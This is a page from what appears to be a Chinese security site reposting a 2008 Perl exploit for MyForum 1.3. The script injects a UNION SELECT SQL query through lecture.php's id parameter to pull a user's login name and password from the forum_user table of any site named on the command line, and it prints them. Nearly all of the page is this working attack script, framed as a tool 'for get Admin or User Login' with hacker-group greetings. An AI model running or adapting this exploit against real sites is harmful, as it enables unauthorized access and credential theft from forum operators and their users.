首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit 来源：d00r[at]telkom[dot]net 作者：Vrs-hCk 发布时间：2008-10-27   #!/usr/bin/perl #***********************************************************************************# # Remote SQL Injection Exploit                                                      # #***********************************************************************************# # Software : MyForum 1.3                                                            # # Download : http://www.easy-script.com/scripts-dl/myforumv1.3.zip                  # # Date     : 27 October 2008 # Author   : Vrs-hCk                                                                # # Contact  : d00r[at]telkom[dot]net                                                 # #***********************************************************************************# # Greetz                                                                            # #***********************************************************************************# # MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org                    # # Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem, # # loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,      # # chawanua, bL4Ck_3n91n3, R3V4N_B4ST4RD, bryan_ae1, dkk ... c0li.m0de.0n !!!        # #***********************************************************************************# use HTTP::Request; use LWP::UserAgent; $bug = "lecture.php?id=1"; $sql = "+union+select+1,concat(0x21,pseudo,0x3a,mdp,0x21),3,4,5,6,7,8+from+forum_user+where+id=1--"; print "\n ******************************************\n"; print " *     MyForum 1.3 Remote SQL Exploit     *\n"; print " *       For get Admin or User Login      *\n"; print " *            Coded by Vrs-hCk            *\n"; print " ******************************************\n\n"; if (@ARGV != 1) { &help; exit(); } sub help(){ print " [?] Use : perl $0 www.target.com\n"; print "           perl $0 www.target.com/path\n\n"; } if ($ARGV[0] =~ /http:\/\// ) { $target = $ARGV[0]."/"; } else { $target = "http://".$ARGV[0]."/"; } print " [SQL] Exploiting ...\n\n"; my $injection = $target.$bug.$sql; my $request   = HTTP::Request->new(GET=>$injection); my $useragent = LWP::UserAgent->new(); $useragent->timeout(10); my $response  = $useragent->request($request); if ($response->is_success) { my $res   = $response->content; if ($res =~ m/!(.*):(.*)!/g) { my ($username,$passwd) = ($1,$2); print " [target] $target \n"; print " [loginx] $username:$passwd \n\n"; } else { print " [SQL] Error, Fail to get admin login.\n\n"; } } else { print " [SQL] Error, ".$response->status_line."\n\n"; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PowerTCP FTP module Multiple T ·PumpKIN TFTP Server 2.7.2.0 De ·vicFTP 5.0 (LIST) Remote Denia ·KVIrc 3.4.0 Virgo Remote Forma ·Linux Kernel < 2.6.22 ftruncat ·TUGzip 3.00 archiver .ZIP File ·e107 Plugin EasyShop (category ·db Software Laboratory VImpX ( ·MS08-067 Remote Stack Overflow ·MS08066本地权限提升漏洞exploit ·H2O-CMS <= 3.4 Remote Command ·Visagesoft eXPert PDF ViewerX   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved